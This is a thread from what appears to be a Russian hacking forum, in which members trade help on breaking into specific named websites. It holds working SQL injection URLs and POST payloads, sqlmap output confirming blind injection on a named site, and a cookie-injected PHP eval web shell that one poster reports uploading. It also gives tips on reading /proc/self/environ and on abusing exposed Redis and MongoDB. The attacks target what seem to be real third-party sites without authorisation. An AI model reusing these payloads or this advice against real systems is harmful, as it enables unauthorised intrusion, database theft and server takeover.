Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Помогите с выводом
    вроде все хорошо
    Code:
    http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,table_name+from+information_schema.tables+limit+0,1--
    но как хочу достать инфу, ничего не выводить
    Code:
    http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,AddressInfoID+from+helpusr.addressinfo--
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(AddressInfoID)+from+addressinfo--+
    count = 0.
    Code:
    http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(username)+from+users+limit+0,1--
    count = 0
     
    _________________________
    teh likes this.
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Сайт: https://www.badjobs.ru/savereview/
    POST:
    Code:
    company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1
    Параметр: city_jobs
    sqlmap:
    Code:
    ---
    Parameter: city_jobs (POST)
      Type: boolean-based blind
      Title: MySQL >= 5.0 boolean-based blind - Parameter replace
      Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=(SELECT (CASE WHEN (8743=8743) THEN 8743 ELSE 8743*(SELECT 8743 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    
      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
      Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iqmj)
    ---
    [06:49:55] [INFO] testing MySQL
    [06:49:55] [INFO] confirming MySQL
    [06:49:55] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.3.28
    back-end DBMS: MySQL >= 5.0.0
     
    #103 kacergei, 23 May 2015
    Last edited: 23 May 2015
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    так никто вам не ответит, нужно смотреть сайт
     
    _________________________
  5. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    Ребята, есть сайт, в сторонних бд которого (не в текущей базе) лежат джумлы.
    Как нибудь можно узнать какому сайту принадлежит база джумлы?
    Например в ВП это делается 1 запросом..
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    таблицы там такой нет. максимум это поиск по контенту или титлу.
    https://rdot.org/forum/showthread.php?t=1990
     
    _________________________
  7. ErrNick

    ErrNick New Member

    Joined:
    17 Aug 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    какие есть варианты поиска абсолютного пути если имеется рутовый доступ в мускуле?
    файл конфига апача не помог тк там Include /etc/apache2/sites-enabled/ а что тут хз ,пробовал site_ru.conf, site.ru.conf, site.ru,siteru.conf не нашел
    перелопатил все базы в поиске пути ничего не нашел гугл тоже не помог
    Debian GNU/Linux 6.0 \n \l
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    https://rdot.org/forum/showthread.php?t=82
    заодно соседей посмотрите на сайте через реверс, возможно через них получится
     
    _________________________
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Помогите раскрутить.
    http://myevent.com/1/helpcenter.htm
    уязвимое поле - поиск

    в итоге поулчаем запрос
    http://myevent.com/submit.php
    POST
    searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE
    searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    с sqli в поиске чаще всего встречается уязвимость в LIKE (%inj%), поэтому нужно закрыть скобку и крутить как обычно:
    Code:
    ') union select 1,2,version(),4-- f
    5.5.38-0ubuntu0.12.04.1-log
     
    _________________________
    BigBear and Br@!ns like this.
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    что тут можно сделать? :) Вывода я так понимаю не добиться, ну хотя бы на blind раскрутить.
    https://secure.androticsdirect.com/register.php?
    POST
    xid=8f75e2274108df112c5f2ad2d230f9bb&title=Mr.&firstname=rwesdf&lastname=wedsa&company=&b_address=ewsfd&b_address_2=&b_city=wesdf&b_state=CA&b_country=US&b_zipcode=52323&s_address=&s_address_2='&s_city=&s_state=CA&s_country=US&s_zipcode=&phone=352523523&email=asfasf'+union+select+1+--+&fax=&url=&additional_values%5B1%5D=Yes&uname=long33&passwd1=123123&passwd2=123123&anonymous=&usertype=C
     
  12. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
  13. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    HeReTiC, huntercs16 and yarbabin like this.
  14. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    {ШЕЛЛЫ тоже запрещено выкладывать, логины и пароли тоже} ps нахтак

    Опять же, по базам лазить нужно, там пути искать, а не только пытаться инклудить конфиги :)
    Пароли от форума или админки поискать, и сразу уже залиться.
    /var/www/tele-club.ru/www/forum/ вот такой путь получился
     
    #115 Br@!ns, 25 May 2015
    Last edited by a moderator: 25 May 2015
    HAXTA4OK and huntercs16 like this.
  16. off

    off Banned

    Joined:
    21 Aug 2006
    Messages:
    55
    Likes Received:
    37
    Reputations:
    6
    Добрый день.
    Есть сервер под управлением Ubuntu 12.04, на нем стоит mongodb 2.4.14 на которой настроена авторизация, но есть доступ. А так же redis 2.4.13, доступ тоже есть. В redis хранятся сессии от node.js (express.js).
    Возможно ли каким-либо образом получить доступ к ОС ? Или прочитать файл .js (местоположение на сервере известно) или получить доступ к админке (путь известен и логин админа тоже).

    По redis, нашел описание уязвимости по модификации местоположения файла dump.rdb (http://www.agarri.fr/kom/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html), но эксплуатация не удается, файл создается но содержимое его видимо в бинарном виде.
     
    #116 off, 25 May 2015
    Last edited: 25 May 2015
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    #117 Br@!ns, 25 May 2015
    Last edited: 25 May 2015
  18. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  19. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    При постановке данных в куки и Юзер агент работает phpinfo(), но не осмысленный код, который позволяет залиться.
    Пробовал в куки ставить <?php eval("$_POST[c]");?>
    Опять же сложный код не работает
    Что сделать можно?

    $_POST[c]=/*$s='/home/virtualki/18281'*/;echo '111';echo 222; = работает
    $_POST[c]=$s='/home/virtualki/18281';echo '111';echo 222; =не работает
    echo('111');echo 222; -работает

    Залился, помог base64
     
    #119 huntercs16, 27 May 2015
    Last edited: 27 May 2015
  20. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Можно было попробовать еще через
    /proc/self/environ
    в User-agent например вставляешь php код